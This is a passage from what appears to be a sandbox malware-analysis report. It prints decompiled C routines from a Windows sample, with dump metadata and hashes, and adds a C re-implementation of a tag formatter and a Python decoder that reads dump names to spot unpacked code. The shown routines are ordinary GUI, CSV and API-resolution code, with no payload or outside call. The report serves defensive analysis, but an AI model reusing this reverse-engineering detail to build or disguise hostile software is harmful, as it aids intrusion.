                                                                                                                                                					_v8 = __ebx;
                                                                                                                                                					_v8 =  ~_v8;
                                                                                                                                                					_t32 = _t28 * __ebx + _t21;
		_a4 = _t21;
		/* swap two buffers row by row (__ebx bytes per row) via the temporary _v16 */
		do {
			memcpy(_v16, _a4, __ebx);
			memcpy(_a4, _t32, __ebx);
			_t20 = memcpy(_t32, _v16, __ebx);
			_a4 = _a4 + __ebx;
			_t32 = _t32 + _v8;
			_t34 = _t34 + 0x24;
			_v12 = _v12 + 1;
			_t28 = _t28 - 1;
		} while (_t28 > _v12);
	}
	/* L0040E032 is operator delete (??3@ in the API ID below): release the temporary */
	_push(_v16);
	L0040E032();
	return _t20;
}

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$??2@??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1252195045-0
                                                                                                                                                • Opcode ID: 84cba42ff6f7e9e76cb5b3eb48464ce6a132065f142cfd3aba4b79740acf243f
                                                                                                                                                • Instruction ID: 9c944120e002927f8eec2413523e8dcd2a94c32319e751658ec61dd6637171fa
                                                                                                                                                • Opcode Fuzzy Hash: 84cba42ff6f7e9e76cb5b3eb48464ce6a132065f142cfd3aba4b79740acf243f
                                                                                                                                                • Instruction Fuzzy Hash: C0012172C00118BBDF106FAAD8819DEBFB9EF44394F10807AF808B6152D6755E559B98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 76%
/* destructor-style cleanup: frees four heap members of the object in __esi and nulls the pointers;
   L0040E032 is operator delete (??3@ in the API ID below) */
E0040768E(void* __esi) {
	intOrPtr _t9;
	intOrPtr _t10;
	intOrPtr _t11;
	intOrPtr* _t18;
	void* _t19;

	_t19 = __esi;
	_t9 =  *((intOrPtr*)(__esi + 0x38));
	if(_t9 != 0) {
		_push(_t9);
		L0040E032();
	}
	_t10 =  *((intOrPtr*)(_t19 + 0x48));
	if(_t10 != 0) {
		_push(_t10);
		L0040E032();
	}
	_t11 =  *((intOrPtr*)(_t19 + 0x2e4));
	if(_t11 != 0) {
		_push(_t11);
		L0040E032();
	}
	/* member at +0x2cc is a pointer to a pointer: free the inner buffer, then the holder */
	_t18 =  *((intOrPtr*)(_t19 + 0x2cc));
	if(_t18 != 0) {
		_t11 =  *_t18;
		if(_t11 != 0) {
			_push(_t11);
			L0040E032();
			 *_t18 = 0;
		}
		_push(_t18);
		L0040E032();
	}
	 *((intOrPtr*)(_t19 + 0x2cc)) = 0;
	 *((intOrPtr*)(_t19 + 0x38)) = 0;
	 *((intOrPtr*)(_t19 + 0x48)) = 0;
	 *((intOrPtr*)(_t19 + 0x2e4)) = 0;
	return _t11;
}

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: ecba441bf80caf65155bf32042a5b6e7135137503112716ea17be55409703e0f
                                                                                                                                                • Instruction ID: 342c1f177218003cdd1623b0f4e7fc54ae999312f226978e8e9af0a1ecb46938
                                                                                                                                                • Opcode Fuzzy Hash: ecba441bf80caf65155bf32042a5b6e7135137503112716ea17be55409703e0f
                                                                                                                                                • Instruction Fuzzy Hash: F1F03C72949A515BC724AE6ED8C485BB3E9AB043647604C3FF14AE3690CA39BC904A1C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 93%
/* window procedure: _a4 is the message id, _a8/_a12 are wParam/lParam;
   handles WM_SIZE (5), WM_PAINT (0xf) and WM_GETMINMAXINFO (0x24), then forwards to E004015CE */
E00403054(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
	intOrPtr _v8;
	void* __ebx;
	void* __esi;
	intOrPtr _t15;
	struct HDWP__* _t31;
	intOrPtr _t34;
	RECT* _t36;

	_push(__ecx);
	_t34 = __ecx;
	_v8 = __ecx;
	if(_a4 != 5) {
		if(_a4 != 0xf) {
			if(_a4 == 0x24) {
				/* WM_GETMINMAXINFO: lParam is a MINMAXINFO; +0x18/+0x1c are ptMinTrackSize.x/y,
				   so the window cannot be shrunk below 200 x 120 pixels */
				_t15 = _a12;
				 *((intOrPtr*)(_t15 + 0x18)) = 0xc8;
				 *((intOrPtr*)(_t15 + 0x1c)) = 0x78;
			}
		} else {
			/* WM_PAINT */
			E00401810(__ecx + 0x40);
		}
	} else {
		/* WM_SIZE: reposition three child controls in one deferred batch, then repaint */
		_t31 = BeginDeferWindowPos(3);
		_t36 = _t34 + 0x40;
		E004017E9(_t36, _t31, 0x3f1, 0, 0, 1);
		E004017E9(_t36, _t31, 1, 1, 1, 0);
		E004017E9(_t36, _t31, 2, 1, 1, 0);
		EndDeferWindowPos(_t31);
		InvalidateRect( *(_t36 + 0x10), _t36, 1);
		_t34 = _v8;
	}
	return E004015CE(_t34, _a4, _a8, _a12);
}

                                                                                                                                                APIs
                                                                                                                                                • BeginDeferWindowPos.USER32 ref: 00403068
                                                                                                                                                  • Part of subcall function 004017E9: GetDlgItem.USER32 ref: 004017F2
                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040309E
                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004030A9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DeferWindow$BeginInvalidateItemRect
                                                                                                                                                • String ID: $
                                                                                                                                                • API String ID: 4234876885-3993045852
                                                                                                                                                • Opcode ID: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
                                                                                                                                                • Instruction ID: 5bd367454bd051cdd9e75425df65f1b17fedc8d2c9609545a756db00ac89be97
                                                                                                                                                • Opcode Fuzzy Hash: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
                                                                                                                                                • Instruction Fuzzy Hash: 65119171140208FFEB215F51CCC5F6F3AACEB05799F10403AF5053A1D0D675AE459BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                			E00409457(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                				void _v514;
                                                                                                                                                				signed short _v516;
                                                                                                                                                				void _v1026;
                                                                                                                                                				signed short _v1028;
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* _t17;
                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                				signed short* _t28;
                                                                                                                                                
                                                                                                                                                				_v516 = _v516 & 0x00000000;
                                                                                                                                                				_t26 = __ecx;
                                                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                                                				_v1028 = _v1028 & 0x00000000;
                                                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                                                                                				_t28 =  &_v516;
                                                                                                                                                				E004086F5(_t28, _t17);
                                                                                                                                                				_push(_t28);
                                                                                                                                                				_push(L"</%s>\r\n");
                                                                                                                                                				_push(0xff);
                                                                                                                                                				_push( &_v1028);
                                                                                                                                                				L0040DFD6();
                                                                                                                                                				return E00408857(_t26, _t26, _a4,  &_v1028);
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040947B
                                                                                                                                                • memset.MSVCRT ref: 00409492
                                                                                                                                                  • Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
                                                                                                                                                  • Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D
                                                                                                                                                • _snwprintf.MSVCRT ref: 004094C1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                • String ID: </%s>
                                                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                                                • Opcode ID: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
                                                                                                                                                • Instruction ID: 85b546f447cb05eec590fc4b387cecce4986b1e61cf39ba9e2c32341b3a77f5f
                                                                                                                                                • Opcode Fuzzy Hash: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
                                                                                                                                                • Instruction Fuzzy Hash: AE0186B3E0012966D720BB55CC45FEA767CEF45318F0004BABB09F71C2DB789E558A98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
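Added worked example (not part of the Joe Sandbox report and not code from the sample): a portable C model of E00409457, the routine above that builds a closing XML tag with _snwprintf. It assumes the buffer sizes read off the decompiled frame (the 2-byte store plus memset of 0x1fc is what MSVC emits for a 255-WCHAR array initialised with {0}) and models E004086F5 as copy-then-lowercase, as its wcscpy/_wcslwr calls indicate. The names copy_lower_tag, format_close_tag, demo_fits and demo_truncated and the tag name "BrowserCookies" are the example's own, not identifiers or strings from the sample.

```c
#include <stddef.h>
#include <stdio.h>
#include <wchar.h>
#include <wctype.h>

/* Size read off the decompiled frame: "_v516 = 0; memset(&_v514, 0, 0x1fc)"
   is the code MSVC emits for "WCHAR buf[255] = {0}" (2 + 0x1fc = 0x1fe bytes). */
#define TAG_BUF_WCHARS 255u

/* Model of E004086F5 (wcscpy followed by _wcslwr), but bounded: copy the tag
   name and lowercase it.  Returns 0 on success, -1 if it would not fit. */
static int copy_lower_tag(wchar_t *dst, size_t dst_len, const wchar_t *src)
{
    size_t i;
    if (dst_len == 0)
        return -1;
    for (i = 0; src[i] != L'\0'; i++) {
        if (i + 1 >= dst_len) {
            dst[0] = L'\0';
            return -1;
        }
        dst[i] = (wchar_t)towlower((wint_t)src[i]);
    }
    dst[i] = L'\0';
    return 0;
}

/* Model of E00409457: format "</name>\r\n" into out.  The sample calls
   _snwprintf(buf, 0xff, ...) on a 255-WCHAR buffer; when the result is 255
   characters or longer MSVCRT fills the buffer without a terminator and
   returns -1.  This version reports -1 the same way but always terminates. */
int format_close_tag(wchar_t *out, size_t out_len, const wchar_t *name)
{
    wchar_t lower[TAG_BUF_WCHARS];
    int n;

    if (out_len == 0)
        return -1;
    if (copy_lower_tag(lower, TAG_BUF_WCHARS, name) != 0) {
        out[0] = L'\0';
        return -1;
    }
    /* %ls, not %s: glibc's swprintf reads a narrow char* for %s, while MSVC's
       _snwprintf reads wchar_t* for %s.  %ls means wchar_t* on both. */
    n = swprintf(out, out_len, L"</%ls>\r\n", lower);
    out[out_len - 1] = L'\0';   /* glibc does not terminate on truncation */
    return n < 0 ? -1 : n;
}

/* Constructed inputs (not strings from the sample) exercising both paths. */
static wchar_t demo_out[TAG_BUF_WCHARS];

/* Ordinary tag name: returns 1 when the output is "</browsercookies>\r\n". */
int demo_fits(void)
{
    int n = format_close_tag(demo_out, TAG_BUF_WCHARS, L"BrowserCookies");
    return n == 19 && wcscmp(demo_out, L"</browsercookies>\r\n") == 0;
}

/* 254-character name: 2 + 254 + 3 = 259 characters cannot fit in 255 slots.
   Returns 1 when truncation is reported and the buffer is still terminated. */
int demo_truncated(void)
{
    wchar_t name[TAG_BUF_WCHARS];
    size_t i;
    int n;
    for (i = 0; i < TAG_BUF_WCHARS - 1; i++)
        name[i] = L'A';
    name[TAG_BUF_WCHARS - 1] = L'\0';
    n = format_close_tag(demo_out, TAG_BUF_WCHARS, name);
    return n == -1 && wcslen(demo_out) < TAG_BUF_WCHARS;
}

int main(void)
{
    printf("fits=%d truncated=%d\n", demo_fits(), demo_truncated());
    return 0;
}
```

The point worth keeping from the decompiled routine is the count passed to _snwprintf: 0xff equals the element count of the 255-WCHAR destination, so a formatted tag of 255 or more characters leaves the buffer unterminated before it is handed to E00408857. Whether a tag name that long can reach this routine depends on the virtual call through slot 0x24 of the object's vtable, which this section of the report does not show.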

                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                			E00406C43(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                				void _v8198;
                                                                                                                                                				short _v8200;
                                                                                                                                                				void* _t9;
                                                                                                                                                				void* _t12;
                                                                                                                                                				intOrPtr _t19;
                                                                                                                                                				intOrPtr _t20;
                                                                                                                                                
                                                                                                                                                				_t19 = __ecx;
                                                                                                                                                				_t9 = E0040E340(0x2004, __ecx);
                                                                                                                                                				_t20 = _t19;
                                                                                                                                                				if(_t20 == 0) {
                                                                                                                                                					_t20 =  *0x412ec8; // 0x0
                                                                                                                                                				}
                                                                                                                                                				_t25 =  *0x412c38;
                                                                                                                                                				if( *0x412c38 != 0) {
                                                                                                                                                					_v8200 = _v8200 & 0x00000000;
                                                                                                                                                					memset( &_v8198, 0, 0x2000);
                                                                                                                                                					_push(_t20);
                                                                                                                                                					_t12 = 5;
                                                                                                                                                					E00406CC6(_t12);
                                                                                                                                                					if(E00406D72(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                                                                                						SetWindowTextW(_a4,  &_v8200);
                                                                                                                                                					}
                                                                                                                                                					return EnumChildWindows(_a4, E00406BAC, 0);
                                                                                                                                                				}
                                                                                                                                                				return _t9;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                • String ID: caption
                                                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                                                • Opcode ID: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
                                                                                                                                                • Instruction ID: 29de1f336f9b1ad8a88558a0c2ea7e463315901b0f4d8a0f0fc28385d02cb639
                                                                                                                                                • Opcode Fuzzy Hash: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
                                                                                                                                                • Instruction Fuzzy Hash: 2DF0A472900314AAFB30AB55DD4AF8A3768DB04714F1100B6FA05B71D2D7B8ADA4CA9C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                			E00405954(struct HWND__* _a4) {
                                                                                                                                                				void _v514;
                                                                                                                                                				short _v516;
                                                                                                                                                				signed int _t11;
                                                                                                                                                
                                                                                                                                                				_v516 = _v516 & 0x00000000;
                                                                                                                                                				memset( &_v514, 0, 0x1fe);
                                                                                                                                                				GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                                                                				_t11 =  &_v516;
                                                                                                                                                				_push(L"edit");
                                                                                                                                                				_push(_t11);
                                                                                                                                                				L0040E03E();
                                                                                                                                                				asm("sbb eax, eax");
                                                                                                                                                				return  ~_t11 + 1;
                                                                                                                                                			}

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
• Opcode ID: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
• Instruction ID: 748b3c7a54d916a83871e5d55f64a5683e5b8dafeb1aa9d8bd9837731e8c37d4
• Opcode Fuzzy Hash: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
• Instruction Fuzzy Hash: D7E0927298031E6AEB20EBB0DC4AFA577ACAB04708F4006B5B914F10C2EAB4964A4A44
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Lazily resolves SHGetSpecialFolderPathW: the shell32.dll module handle is cached at
// 0x413268 and the resolved function pointer at 0x413264 (dynamic API resolution, as
// flagged in the signature list). If the handle was already cached, the decompiled
// code returns the uninitialized _t1.
E0040DA9D() {
	struct HINSTANCE__* _t1;
	_Unknown_base(*)()* _t2;

	if( *0x413268 == 0) {
		_t1 = LoadLibraryW(L"shell32.dll");
		 *0x413268 = _t1;
		if(_t1 != 0) {
			_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
			 *0x413264 = _t2;
			return _t2;
		}
	}
	return _t1;
}

APIs
• LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: AddressLibraryLoadProc
• String ID: SHGetSpecialFolderPathW$shell32.dll
• API String ID: 2574300362-880857682
• Opcode ID: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
• Instruction ID: 122d2585c685c0691ad6c3d54d7046cb00117d102b384f1c3bcadfb2245e5d9f
• Opcode Fuzzy Hash: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
• Instruction Fuzzy Hash: 5ED0C9F0A59300AAD720AF65AE097923AA4AB40713F149576E804F12B0D7B881C8CE6C
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 75%
// Writes one record as a CSV row. For each of the *(__ebx+0x34) field indices stored at
// *(__ebx+0x38), the field text comes from the callback in _a8 (when non-null) or from the
// table at *(__ebx+0x2e4). Fields containing ',', '"', CR or LF are wrapped in quotes with
// embedded quotes doubled (built via E004063DD); fields are joined with "," and the row is
// terminated with "\r\n" (written via E00408857).
E00408885(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
	signed int _v8;
	signed int _v12;
	void* _v16;
	intOrPtr _v20;
	intOrPtr _v24;
	intOrPtr _v28;
	intOrPtr _v32;
	wchar_t* _v36;
	void* __edi;
	signed int _t39;
	wchar_t* _t41;
	signed int _t45;
	signed int _t48;
	wchar_t* _t53;
	wchar_t* _t62;
	wchar_t* _t63;
	wchar_t* _t64;
	void* _t68;
	void* _t69;
	intOrPtr* _t71;
	wchar_t* _t79;
	void* _t81;
	wchar_t* _t83;

	_t68 = __ebx;
	_t79 = 0;
	_v8 = 0;
	if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
		do {
			_t39 =  *( *((intOrPtr*)(_t68 + 0x38)) + _v8 * 4);
			_t71 = _a8;
			if(_t71 != _t79) {
				_t83 =  *((intOrPtr*)( *_t71))(_t39,  *((intOrPtr*)(_t68 + 0x68)));
			} else {
				_t83 =  *( *((intOrPtr*)(_t68 + 0x2e4)) + 0x10 + _t39 * 0x14);
			}
			_t41 = wcschr(_t83, 0x2c);
			_pop(_t69);
			if(_t41 != 0) {
				L10:
				// Field needs quoting: open quote, copy characters (doubling '"'), close quote.
				_v36 = _t79;
				_v32 = _t79;
				_v28 = _t79;
				_v20 = 0x100;
				_v24 = 1;
				_v16 = 0x22;
				E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
				while(1) {
					_t45 =  *_t83 & 0x0000ffff;
					__eflags = _t45;
					_v12 = _t45;
					_t81 =  &_v36;
					if(__eflags == 0) {
						break;
					}
					__eflags = _t45 - 0x22;
					if(__eflags != 0) {
						_push( &_v12);
						_t48 = 1;
						__eflags = 1;
					} else {
						_push(L"\"\"");
						_t48 = _t45 | 0xffffffff;
					}
					E004063DD(_t48, _t69, _t81, __eflags);
					_t83 =  &(_t83[0]);
					__eflags = _t83;
				}
				E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
				_t53 = _v36;
				__eflags = _t53;
				if(_t53 == 0) {
					_t53 = 0x40f454;
				}
				E00408857(_t68, _t69, _a4, _t53);
				E00406355( &_v36);
				_t79 = 0;
				__eflags = 0;
			} else {
				_t62 = wcschr(_t83, 0x22);
				_pop(_t69);
				if(_t62 != 0) {
					goto L10;
				} else {
					_t63 = wcschr(_t83, 0xd);
					_pop(_t69);
					if(_t63 != 0) {
						goto L10;
					} else {
						_t64 = wcschr(_t83, 0xa);
						_pop(_t69);
						if(_t64 != 0) {
							goto L10;
						} else {
							// No special characters: write the field unquoted.
							E00408857(_t68, _t69, _a4, _t83);
						}
					}
				}
			}
			if(_v8 <  *((intOrPtr*)(_t68 + 0x34)) - 1) {
				E00408857(_t68, _t69, _a4, ",");
			}
			_v8 = _v8 + 1;
		} while (_v8 <  *((intOrPtr*)(_t68 + 0x34)));
	}
	return E00408857(_t68, _t69, _a4, L"\r\n");
}
                                                                                                                                                0x00408965
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040893b
                                                                                                                                                0x0040893f
                                                                                                                                                0x0040894e
                                                                                                                                                0x00408951
                                                                                                                                                0x00408951
                                                                                                                                                0x00408941
                                                                                                                                                0x00408941
                                                                                                                                                0x00408946
                                                                                                                                                0x00408946
                                                                                                                                                0x00408952
                                                                                                                                                0x00408958
                                                                                                                                                0x00408958
                                                                                                                                                0x00408958
                                                                                                                                                0x0040896e
                                                                                                                                                0x00408973
                                                                                                                                                0x00408976
                                                                                                                                                0x00408978
                                                                                                                                                0x0040897a
                                                                                                                                                0x0040897a
                                                                                                                                                0x00408985
                                                                                                                                                0x0040898d
                                                                                                                                                0x00408992
                                                                                                                                                0x00408992
                                                                                                                                                0x004088d2
                                                                                                                                                0x004088d5
                                                                                                                                                0x004088dd
                                                                                                                                                0x004088de
                                                                                                                                                0x00000000
                                                                                                                                                0x004088e0
                                                                                                                                                0x004088e3
                                                                                                                                                0x004088eb
                                                                                                                                                0x004088ec
                                                                                                                                                0x00000000
                                                                                                                                                0x004088ee
                                                                                                                                                0x004088f1
                                                                                                                                                0x004088f9
                                                                                                                                                0x004088fa
                                                                                                                                                0x00000000
                                                                                                                                                0x004088fc
                                                                                                                                                0x00408902
                                                                                                                                                0x00408902
                                                                                                                                                0x004088fa
                                                                                                                                                0x004088ec
                                                                                                                                                0x004088de
                                                                                                                                                0x0040899b
                                                                                                                                                0x004089a7
                                                                                                                                                0x004089a7
                                                                                                                                                0x004089ac
                                                                                                                                                0x004089b2
                                                                                                                                                0x004089bb
                                                                                                                                                0x004089cd

APIs
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: wcschr$memcpywcslen
• String ID:
• API String ID: 1983396471-0
• Opcode ID: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
• Instruction ID: 891d09ae9378dccf635ba886e12c54397b7589aa880eb7d9b0c0a307a2786e7e
• Opcode Fuzzy Hash: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
• Instruction Fuzzy Hash: 5B41B431900214ABDF10FEA5C941AAE7BB8EF04328F50853FF891F72C2DB7899458A59
Uniqueness

Uniqueness Score: -1.00%

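The dump file names under "Memory Dump Source" encode where each dumped region came from. The following is an added example, not code from the Joe Sandbox report or from the sample, that decodes those names into a region map. It assumes the naming convention is <proc>.<stage>.<seq>.<base>.<protect>.<type>.sdmp and that the last two fields are the winnt.h page-protection and allocation-type constants; the field names (proc, stage, seq) are my own labels for the positions, not documented names. On the five names above, the region at 0x401000 decodes as PAGE_EXECUTE_READ inside MEM_PRIVATE memory, i.e. executable code that is not backed by a loaded image section, which is what a PE mapped into memory by an unpacker looks like, while the header, .rdata-like and .rsrc-like regions decode as PAGE_READONLY and the region at 0x412000 as PAGE_READWRITE.

```python
"""Decode Joe Sandbox memory-dump file names into a region map.

Constructed example; it is not part of the sandbox report or the sample.
The field layout <proc>.<stage>.<seq>.<base>.<protect>.<type>.sdmp is an
assumption about the naming convention; the protection and allocation-type
values are the Windows constants from winnt.h.
"""
import re
from dataclasses import dataclass

# winnt.h page-protection constants (low byte of the protect field)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80

# winnt.h allocation-type constants (MEMORY_BASIC_INFORMATION.Type)
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

DUMP_NAME = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<seq>[0-9]+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    proc: int       # assumed: process index in the report (hex)
    stage: int      # assumed: dump stage (hex)
    seq: int        # assumed: dump sequence number (decimal)
    base: int       # region base address
    protect: int    # page protection at dump time
    mem_type: int   # allocation type (MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE)

    @property
    def protect_name(self) -> str:
        main = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:02x}")
        mods = [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([main] + mods)

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTE_MASK)


def parse_dump_name(name: str) -> DumpRegion:
    """Split one .sdmp file name into its fields (all hex except seq)."""
    m = DUMP_NAME.match(name)
    if m is None:
        raise ValueError(f"not a recognised dump name: {name!r}")
    return DumpRegion(
        name=name,
        proc=int(m["proc"], 16),
        stage=int(m["stage"], 16),
        seq=int(m["seq"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["mtype"], 16),
    )


def region_map(names):
    """Regions sorted by base address, so the dumps read like a section table."""
    return sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)


def private_executable(names):
    """Names of dumps that are executable but not backed by an image section.

    Code running from MEM_PRIVATE memory was written there at run time
    (unpacked, injected or generated); a normally loaded PE has MEM_IMAGE.
    """
    return [r.name for r in region_map(names) if r.executable and r.mem_type == 0x20000]


# The five dump names listed under "Memory Dump Source" for this function.
SAMPLE_DUMPS = [
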